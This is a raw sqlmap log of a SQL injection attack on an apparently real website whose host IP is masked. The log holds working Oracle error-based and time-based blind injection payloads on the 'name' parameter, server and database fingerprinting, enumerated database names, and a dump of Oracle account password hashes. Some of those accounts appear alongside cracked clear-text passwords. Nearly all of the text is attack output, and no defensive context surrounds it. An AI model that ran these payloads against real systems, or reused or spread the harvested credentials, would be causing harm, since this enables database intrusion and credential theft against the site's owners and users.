./sqlmap.py -u "http://**.**.**.**:80/tmap/map_unicom_list.asp?province=31&type=1&name=1&companytype=11&page=1" -p name
--- Parameter: name (GET) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: province=31&type=1&name=1' AND 8515=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (8515=8515) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'WRhY' LIKE 'WRhY&companytype=11&page=1 Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: province=31&type=1&name=1' AND 7020=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'UZfg' LIKE 'UZfg&companytype=11&page=1 --- [12:01:22] [INFO] the back-end DBMS is Oracle web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Oracle available databases [7]: [*] CTXSYS [*] EXFSYS [*] MDSYS [*] OLAPSYS [*] SYS [*] SYSTEM [*] TSH_CMS
[*] _NEXT_USER [1]: password hash: NULL [*] ANONYMOUS [1]: password hash: anonymous [*] AQ_ADMINISTRATOR_ROLE [1]: password hash: NULL [*] AQ_USER_ROLE [1]: password hash: NULL [*] AUTHENTICATEDUSER [1]: password hash: NULL [*] CONNECT [1]: password hash: NULL [*] CTXAPP [1]: password hash: NULL [*] CTXSYS [1]: password hash: 71E687F036AD56E5 [*] CWM_USER [1]: password hash: NULL [*] DBA [1]: password hash: NULL [*] DBSNMP [1]: password hash: 8A7084606AE5EB5C [*] DELETE_CATALOG_ROLE [1]: password hash: NULL [*] DIP [1]: password hash: CE4A36B8E06CA59C clear-text password: DIP [*] DMSYS [1]: password hash: BFBA5A553FD9E28A [*] EJBCLIENT [1]: password hash: NULL [*] EXECUTE_CATALOG_ROLE [1]: password hash: NULL [*] EXFSYS [1]: password hash: 66F4EF5650C20355 [*] EXP_FULL_DATABASE [1]: password hash: NULL [*] GATHER_SYSTEM_STATISTICS [1]: password hash: NULL [*] GLOBAL_AQ_USER_ROLE [1]: password hash: GLOBAL [*] HS_ADMIN_ROLE [1]: password hash: NULL [*] IMP_FULL_DATABASE [1]: password hash: NULL [*] JAVA_ADMIN [1]: password hash: NULL [*] JAVA_DEPLOY [1]: password hash: NULL [*] JAVADEBUGPRIV [1]: password hash: NULL [*] JAVAIDPRIV [1]: password hash: NULL [*] JAVASYSPRIV [1]: password hash: NULL [*] JAVAUSERPRIV [1]: password hash: NULL [*] LOGSTDBY_ADMINISTRATOR [1]: password hash: NULL [*] MDDATA [1]: password hash: DF02A496267DEE66 clear-text password: MDDATA [*] MDSYS [1]: password hash: 72979A94BAD2AF80 [*] MGMT_USER [1]: password hash: NULL [*] MGMT_VIEW [1]: password hash: 935F95FB02BB4765 [*] OEM_ADVISOR [1]: password hash: NULL [*] OEM_MONITOR [1]: password hash: NULL [*] OLAP_DBA [1]: password hash: NULL [*] OLAP_USER [1]: password hash: NULL [*] OLAPI_TRACE_USER [1]: password hash: NULL [*] OLAPSYS [1]: password hash: 4AC23CC3B15E2208 [*] ORACLE_OCM [1]: password hash: 5A2E026A9157958C [*] ORDPLUGINS [1]: password hash: 88A2B2C183431F00 [*] ORDSYS [1]: password hash: 7EFA02EC7EA6B86F clear-text password: ORDSYS [*] OUTLN [1]: password hash: 4A3BA55E08595C81 [*] PUBLIC [1]: password hash: NULL [*] RECOVERY_CATALOG_OWNER [1]: password hash: NULL [*] RESOURCE [1]: password hash: NULL [*] SCHEDULER_ADMIN [1]: password hash: NULL [*] SELECT_CATALOG_ROLE [1]: password hash: NULL [*] SI_INFORMTN_SCHEMA [1]: password hash: 84B8CBCA4D477FA3 clear-text password: SI_INFORMTN_SCHEMA [*] SJSC [1]: password hash: F78A2CA3C9FC1704 clear-text password: SJSC [*] SYS [1]: password hash: 75800913E1B66343 [*] SYSMAN [1]: password hash: 28F72A3C2D75FDE9 [*] SYSTEM [1]: password hash: 970BAA5B81930A40 [*] TSH_CMS [1]: password hash: AB00BC770037B5D7 [*] TSMSYS [1]: password hash: 3DF26A8B17D0F29F [*] UNISK_TEST [1]: password hash: 273DB3E97685FF90 [*] UNITEST [1]: password hash: A2E8021EA6E17874 clear-text password: UNITEST [*] UNIWO [1]: password hash: FF370F03D3985606 clear-text password: UNIWO [*] WM_ADMIN_ROLE [1]: password hash: NULL [*] WMSYS [1]: password hash: 7C9BA362F8314299 [*] XDB [1]: password hash: 88D8364765FCE6AF [*] XDBADMIN [1]: password hash: NULL [*] XDBWEBSERVICES [1]: password hash: NULL